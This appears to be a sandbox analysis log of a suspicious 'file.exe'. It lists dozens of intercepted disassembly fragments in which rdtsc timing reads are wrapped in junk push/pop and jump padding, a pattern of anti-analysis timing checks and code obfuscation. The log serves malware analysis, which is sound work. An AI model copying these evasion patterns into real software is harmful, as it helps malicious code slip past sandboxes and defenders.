Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0388 second address: 54C03B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E8080F364h 0x00000009 adc ch, 00000068h 0x0000000c jmp 00007F5E8080F35Bh 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C03B1 second address: 54C03C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5E810FCBABh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470038 second address: 547003E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547003E second address: 54700DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push esi 0x0000000f jmp 00007F5E810FCBABh 0x00000014 pop esi 0x00000015 call 00007F5E810FCBB9h 0x0000001a pushfd 0x0000001b jmp 00007F5E810FCBB0h 0x00000020 xor cx, DF08h 0x00000025 jmp 00007F5E810FCBABh 0x0000002a popfd 0x0000002b pop ecx 0x0000002c popad 0x0000002d and esp, FFFFFFF8h 0x00000030 jmp 00007F5E810FCBAFh 0x00000035 xchg eax, ecx 0x00000036 jmp 00007F5E810FCBB6h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F5E810FCBADh 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54700DF second address: 54700F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F361h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54700F4 second address: 5470128 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 jmp 00007F5E810FCBB3h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5E810FCBB5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470128 second address: 547012E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547012E second address: 5470132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470132 second address: 5470163 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F363h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E8080F365h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470163 second address: 5470209 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E810FCBB7h 0x00000009 add ecx, 6EC672DEh 0x0000000f jmp 00007F5E810FCBB9h 0x00000014 popfd 0x00000015 movzx eax, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d mov bx, si 0x00000020 pushfd 0x00000021 jmp 00007F5E810FCBB4h 0x00000026 sub ecx, 547D3208h 0x0000002c jmp 00007F5E810FCBABh 0x00000031 popfd 0x00000032 popad 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 jmp 00007F5E810FCBABh 0x0000003c pushfd 0x0000003d jmp 00007F5E810FCBB8h 0x00000042 sbb ah, FFFFFF98h 0x00000045 jmp 00007F5E810FCBABh 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470209 second address: 547020F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547020F second address: 5470213 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470213 second address: 5470224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470224 second address: 547023C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547023C second address: 5470242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470242 second address: 5470246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470246 second address: 547024A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547024A second address: 54702EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F5E810FCBB6h 0x0000000e mov dword ptr [esp], esi 0x00000011 pushad 0x00000012 mov eax, 5866265Dh 0x00000017 mov dx, si 0x0000001a popad 0x0000001b mov esi, dword ptr [ebp+08h] 0x0000001e pushad 0x0000001f mov edi, ecx 0x00000021 mov bx, si 0x00000024 popad 0x00000025 xchg eax, edi 0x00000026 pushad 0x00000027 jmp 00007F5E810FCBB6h 0x0000002c push eax 0x0000002d call 00007F5E810FCBB1h 0x00000032 pop ecx 0x00000033 pop ebx 0x00000034 popad 0x00000035 push eax 0x00000036 pushad 0x00000037 jmp 00007F5E810FCBADh 0x0000003c mov bx, cx 0x0000003f popad 0x00000040 xchg eax, edi 0x00000041 pushad 0x00000042 mov ch, A2h 0x00000044 push eax 0x00000045 push edx 0x00000046 pushfd 0x00000047 jmp 00007F5E810FCBABh 0x0000004c sbb al, 0000003Eh 0x0000004f jmp 00007F5E810FCBB9h 0x00000054 popfd 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54702EF second address: 547034B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test esi, esi 0x00000009 jmp 00007F5E8080F35Ch 0x0000000e je 00007F5EF22CD667h 0x00000014 pushad 0x00000015 mov ecx, 5DEDA44Dh 0x0000001a mov si, 3849h 0x0000001e popad 0x0000001f cmp dword ptr [esi+08h], DDEEDDEEh 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F5E8080F361h 0x0000002f add esi, 2A7F8ED6h 0x00000035 jmp 00007F5E8080F361h 0x0000003a popfd 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547034B second address: 5470350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470350 second address: 547037A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F367h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F5EF22CD616h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov cx, dx 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547037A second address: 54703A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E810FCBB7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54703A4 second address: 54703CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5E8080F35Fh 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e or edx, dword ptr [ebp+0Ch] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 call 00007F5E8080F35Ah 0x00000019 pop ecx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54703CE second address: 5470406 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 mov cx, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test edx, 61000000h 0x00000012 jmp 00007F5E810FCBB5h 0x00000017 jne 00007F5EF2BBAE39h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ebx, 2B0FA58Eh 0x00000025 push ebx 0x00000026 pop eax 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470406 second address: 547043C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F360h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d jmp 00007F5E8080F360h 0x00000012 jne 00007F5EF22CD5C9h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ax, dx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547043C second address: 5470441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54608DD second address: 54608FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F35Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5E8080F35Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54608FE second address: 5460949 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5E810FCBB1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov dx, cx 0x00000014 mov edi, eax 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 jmp 00007F5E810FCBB2h 0x0000001e and esp, FFFFFFF8h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460949 second address: 546094E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546094E second address: 54609AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F5E810FCBB6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop ebx 0x00000015 pushfd 0x00000016 jmp 00007F5E810FCBB8h 0x0000001b jmp 00007F5E810FCBB5h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54609AE second address: 54609B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54609B4 second address: 54609B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54609B8 second address: 54609D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5E8080F361h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54609D6 second address: 54609EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54609EB second address: 5460A56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F361h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov bh, ah 0x0000000d mov al, dh 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 call 00007F5E8080F361h 0x00000017 pushad 0x00000018 popad 0x00000019 pop ecx 0x0000001a push edi 0x0000001b call 00007F5E8080F35Ah 0x00000020 pop ecx 0x00000021 pop ebx 0x00000022 popad 0x00000023 xchg eax, esi 0x00000024 jmp 00007F5E8080F35Eh 0x00000029 mov esi, dword ptr [ebp+08h] 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F5E8080F367h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460A56 second address: 5460ACE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, C73Ah 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebx, 00000000h 0x00000011 jmp 00007F5E810FCBACh 0x00000016 test esi, esi 0x00000018 pushad 0x00000019 mov eax, 43A97F8Dh 0x0000001e pushfd 0x0000001f jmp 00007F5E810FCBAAh 0x00000024 add cl, FFFFFFA8h 0x00000027 jmp 00007F5E810FCBABh 0x0000002c popfd 0x0000002d popad 0x0000002e je 00007F5EF2BC249Eh 0x00000034 jmp 00007F5E810FCBB6h 0x00000039 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000040 pushad 0x00000041 mov ebx, ecx 0x00000043 mov ax, D3D9h 0x00000047 popad 0x00000048 mov ecx, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d pushad 0x0000004e popad 0x0000004f mov edx, 23643402h 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460ACE second address: 5460B61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F368h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F5EF22D4C0Fh 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 pushfd 0x00000014 jmp 00007F5E8080F35Ah 0x00000019 and cl, FFFFFFC8h 0x0000001c jmp 00007F5E8080F35Bh 0x00000021 popfd 0x00000022 popad 0x00000023 test byte ptr [76FB6968h], 00000002h 0x0000002a pushad 0x0000002b mov cl, 29h 0x0000002d pushfd 0x0000002e jmp 00007F5E8080F361h 0x00000033 add al, FFFFFFE6h 0x00000036 jmp 00007F5E8080F361h 0x0000003b popfd 0x0000003c popad 0x0000003d jne 00007F5EF22D4BCBh 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 call 00007F5E8080F363h 0x0000004b pop ecx 0x0000004c mov ch, bl 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460B61 second address: 5460BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 push ebx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edx, dword ptr [ebp+0Ch] 0x0000000d pushad 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F5E810FCBB0h 0x00000015 sub ax, 2518h 0x0000001a jmp 00007F5E810FCBABh 0x0000001f popfd 0x00000020 pop esi 0x00000021 popad 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F5E810FCBACh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460BA5 second address: 5460BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460BAB second address: 5460BD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F5E810FCBB1h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460BD4 second address: 5460C01 instructions: 0x00000000 rdtsc 0x00000002 call 00007F5E8080F35Ah 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop edi 0x00000011 jmp 00007F5E8080F366h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460C01 second address: 5460C3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov di, AF80h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e jmp 00007F5E810FCBB4h 0x00000013 mov dword ptr [esp], ebx 0x00000016 jmp 00007F5E810FCBB0h 0x0000001b push dword ptr [ebp+14h] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 mov cl, C7h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460C3E second address: 5460C7C instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov dx, E6E6h 0x0000000b jmp 00007F5E8080F367h 0x00000010 popad 0x00000011 popad 0x00000012 push dword ptr [ebp+10h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5E8080F365h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460C7C second address: 5460C8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E810FCBACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460C8C second address: 5460C90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460CD1 second address: 5460D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007F5E810FCBAEh 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460D00 second address: 5460D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460D04 second address: 5460D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460D0A second address: 5460D19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E8080F35Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460D19 second address: 5460D1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460D1D second address: 5460D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esp, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5E8080F35Bh 0x00000011 sub cx, E44Eh 0x00000016 jmp 00007F5E8080F369h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F5E8080F360h 0x00000022 adc cl, FFFFFFC8h 0x00000025 jmp 00007F5E8080F35Bh 0x0000002a popfd 0x0000002b popad 0x0000002c pop ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F5E8080F365h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460D8C second address: 5460D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460D92 second address: 5460D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470D83 second address: 5470DC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5E810FCBB6h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov eax, 335B0989h 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ax, dx 0x0000001f call 00007F5E810FCBADh 0x00000024 pop esi 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470A66 second address: 5470B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushfd 0x00000007 jmp 00007F5E8080F363h 0x0000000c adc eax, 7F11A4AEh 0x00000012 jmp 00007F5E8080F369h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F5E8080F35Eh 0x00000021 push eax 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F5E8080F361h 0x00000029 and ax, C396h 0x0000002e jmp 00007F5E8080F361h 0x00000033 popfd 0x00000034 mov ch, 08h 0x00000036 popad 0x00000037 xchg eax, ebp 0x00000038 pushad 0x00000039 movsx edx, cx 0x0000003c push eax 0x0000003d pushad 0x0000003e popad 0x0000003f pop ebx 0x00000040 popad 0x00000041 mov ebp, esp 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 jmp 00007F5E8080F35Fh 0x0000004b pushad 0x0000004c popad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470B01 second address: 5470B0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 7618h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F00BB second address: 54F00C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F00C1 second address: 54F00F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E810FCBB5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F00F2 second address: 54F00F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F00F8 second address: 54F00FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F00FC second address: 54F0121 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ebx, esi 0x0000000c pushad 0x0000000d mov ax, 0EEDh 0x00000011 mov ax, ACE9h 0x00000015 popad 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5E8080F35Bh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F0121 second address: 54F0127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0435 second address: 54E04C0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5E8080F35Eh 0x00000008 xor cl, 00000068h 0x0000000b jmp 00007F5E8080F35Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F5E8080F366h 0x0000001a or si, 5BC8h 0x0000001f jmp 00007F5E8080F35Bh 0x00000024 popfd 0x00000025 mov ah, 1Dh 0x00000027 popad 0x00000028 popad 0x00000029 push eax 0x0000002a jmp 00007F5E8080F362h 0x0000002f xchg eax, ebp 0x00000030 pushad 0x00000031 call 00007F5E8080F35Eh 0x00000036 movzx eax, bx 0x00000039 pop edi 0x0000003a mov eax, 123D11B3h 0x0000003f popad 0x00000040 mov ebp, esp 0x00000042 pushad 0x00000043 pushad 0x00000044 mov cl, CDh 0x00000046 popad 0x00000047 popad 0x00000048 pop ebp 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E04C0 second address: 54E04C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E04C4 second address: 54E04C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E04C8 second address: 54E04CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E02C9 second address: 54E0317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E8080F368h 0x00000009 sub ah, 00000008h 0x0000000c jmp 00007F5E8080F35Bh 0x00000011 popfd 0x00000012 jmp 00007F5E8080F368h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0317 second address: 54E031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
